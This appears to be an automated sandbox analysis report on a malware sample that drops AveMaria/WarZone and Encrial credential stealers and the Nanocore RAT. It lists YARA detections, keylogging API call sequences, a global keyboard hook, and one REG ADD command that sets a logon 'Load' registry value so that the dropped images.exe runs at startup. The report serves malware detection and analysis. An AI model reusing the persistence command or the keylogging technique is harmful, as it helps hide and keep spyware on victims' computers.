      Source: Xjf4yH9N2t.exeString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
      Source: Xjf4yH9N2t.exe, 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, images.exe, 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
      Source: images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
      Source: images.exe, 00000016.00000002.482254171.0000000004A17000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chro
      Source: images.exe, 00000016.00000002.482254171.0000000004A17000.00000004.00000001.sdmp, images.exe, 00000016.00000002.482229544.00000000049CB000.00000004.00000001.sdmp, images.exe, 00000016.00000002.482220451.00000000049A0000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
      Source: images.exe, 00000016.00000002.482229544.00000000049CB000.00000004.00000001.sdmp, images.exe, 00000016.00000002.482220451.00000000049A0000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      barindex
      Installs a global keyboard hookShow sources
      Source: C:\ProgramData\images.exeWindows user hook set: 0 keyboard low level C:\ProgramData\images.exe
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040813A GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00408793 DefWindowProcA,GetRawInputData,GetRawInputData,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrcpyW,CreateFileW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,CloseHandle,PostQuitMessage,RegisterRawInputDevices,

      E-Banking Fraud:

      barindex
      Yara detected AveMaria stealerShow sources
      Source: Yara matchFile source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.5264629.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.5260000.20.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.5260000.20.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3e8db04.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3e88e65.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000028.00000002.476683090.0000000002CA1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.479953948.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTR
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 40.2.KetqqsbuJ.exe.6c50000.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6c70000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.60a0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.3cb81d4.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.5264629.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.5260000.20.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
      Source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
      Source: 40.2.KetqqsbuJ.exe.6cc0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.5260000.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.40006e6.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6c30000.29.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.2d270d0.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6c00000.26.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
      Source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
      Source: 40.2.KetqqsbuJ.exe.5160000.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.40006e6.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.3cae5cf.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6c8e8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
      Source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
      Source: 40.2.KetqqsbuJ.exe.2d479bc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.2d479bc.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 40.2.KetqqsbuJ.exe.2cf4ec4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.3fe9487.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.3fe9487.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 40.2.KetqqsbuJ.exe.3ca9930.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.3ff22b6.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.5280000.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6c20000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6c84c9f.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
      Source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
      Source: 40.2.KetqqsbuJ.exe.6c70000.32.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6c40000.30.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6ab0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.60a0000.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6c40000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6c50000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.3ff22b6.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.3e8db04.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 40.2.KetqqsbuJ.exe.3e88e65.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6c10000.27.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.3ca9930.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6c10000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6cc0000.36.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.2d3334c.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.2d3334c.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 40.2.KetqqsbuJ.exe.6c00000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6c80000.35.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.2d3334c.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6c30000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.3fe9487.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.6c80000.35.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.5280000.21.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.2d270d0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 40.2.KetqqsbuJ.exe.2d270d0.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 40.2.KetqqsbuJ.exe.3e88e65.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000028.00000002.483249527.0000000006C70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000028.00000002.482686729.00000000060A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000028.00000002.482161790.0000000005280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
      Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
      Source: 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000028.00000002.483212056.0000000006C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000028.00000002.480758507.0000000003F8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000028.00000002.482070499.0000000005160000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000028.00000002.477157085.0000000002D0B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000028.00000002.483147601.0000000006C20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000028.00000002.483312618.0000000006CC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000028.00000002.483262615.0000000006C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
      Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
      Source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00413279
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0041DEAA
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_06CD1998
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_06CC46D3
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_06CC42EB
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_06CC3324
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_02BEE480
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_02BEE47B
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_02BEBBD4
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_050AF5F8
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_050A9788
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_050AA61B
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_050AA611
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: String function: 004036F7 appears 71 times
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: String function: 00411E88 appears 49 times
      Source: Xjf4yH9N2t.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Xjf4yH9N2t.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Xjf4yH9N2t.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: images.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: images.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: images.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: microC[1].exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: microC[1].exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: microC[1].exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: KetqqsbuJ.exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: KetqqsbuJ.exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: KetqqsbuJ.exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dhcpmon.exe.40.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dhcpmon.exe.40.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dhcpmon.exe.40.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Xjf4yH9N2t.exe, 00000000.00000000.203862772.0000000000972000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMdaHelp.exe< vs Xjf4yH9N2t.exe
      Source: Xjf4yH9N2t.exeBinary or memory string: OriginalFilename vs Xjf4yH9N2t.exe
      Source: Xjf4yH9N2t.exe, 00000005.00000002.242412512.0000000000082000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMdaHelp.exe< vs Xjf4yH9N2t.exe
      Source: Xjf4yH9N2t.exeBinary or memory string: OriginalFilename vs Xjf4yH9N2t.exe
      Source: Xjf4yH9N2t.exe, 00000006.00000002.243660750.00000000000F2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMdaHelp.exe< vs Xjf4yH9N2t.exe
      Source: Xjf4yH9N2t.exeBinary or memory string: OriginalFilename vs Xjf4yH9N2t.exe
      Source: Xjf4yH9N2t.exe, 00000007.00000000.244612473.0000000000762000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMdaHelp.exe< vs Xjf4yH9N2t.exe
      Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
      Source: Xjf4yH9N2t.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
      Source: 40.2.KetqqsbuJ.exe.6c50000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c50000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.6c70000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c70000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.60a0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.60a0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.3cb81d4.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.3cb81d4.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.5264629.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.5264629.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.5260000.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.5260000.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
